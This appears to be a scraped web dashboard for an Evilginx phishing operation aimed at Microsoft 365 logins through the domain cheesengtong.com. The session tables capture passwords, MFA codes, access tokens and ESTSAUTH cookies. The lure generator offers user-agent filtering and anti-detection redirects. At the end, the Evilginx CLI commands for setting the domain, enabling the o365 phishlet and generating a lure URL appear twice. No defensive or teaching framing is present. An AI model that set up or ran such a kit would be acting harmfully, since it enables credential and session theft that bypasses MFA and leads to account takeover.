Dashboard
Captured Sessions
0
Total credentials captured
Active Phishlets
1
o365 (enabled)
Active Lures
0
Ready to deploy
Domain
cheesengtong.com
SSL: Let's Encrypt ✅
Recent Captured Sessions
| # | Password | MFA Code | IP Address | Status | Timestamp | Actions | |
|---|---|---|---|---|---|---|---|
| No sessions yet — open the Phishing Page tab and enter test credentials. | |||||||
Captured Sessions
All Sessions
| # | Password | MFA | IP | Access Token (preview) | ESTSAUTH Cookie | Timestamp | Actions | |
|---|---|---|---|---|---|---|---|---|
| No sessions captured yet. | ||||||||
Phishlet Editor
Edit Phishlet Configuration
Internal identifier
The real domain to proxy
e.g. login → login.cheesengtong.com
Full phishlet definition — proxy hosts, URL rewrites, cookie capture, credential extraction
Lure Generator
Create Phishing Lure
Where to send victim after capture
Optional custom URL path
Only serve phishing page to matching user agents
Active Lures
| # | Phishlet | URL | Redirect | Clicks | Created |
|---|---|---|---|---|---|
| No lures created yet. | |||||
Settings
Server Configuration
Your phishing domain
Public IP of your VPS
Default redirect for non-lure visitors (anti-detection)
# Start Evilginx with your domain
sudo ./evilginx -p ./phishlets
# Inside Evilginx CLI:
config domain cheesengtong.com
config ipv4 YOUR_VPS_IP
phishlets hostname o365 cheesengtong.com
phishlets enable o365
lures create o365
lures get-url 0
sudo ./evilginx -p ./phishlets
# Inside Evilginx CLI:
config domain cheesengtong.com
config ipv4 YOUR_VPS_IP
phishlets hostname o365 cheesengtong.com
phishlets enable o365
lures create o365
lures get-url 0
Run these commands on your VPS after deploying Evilginx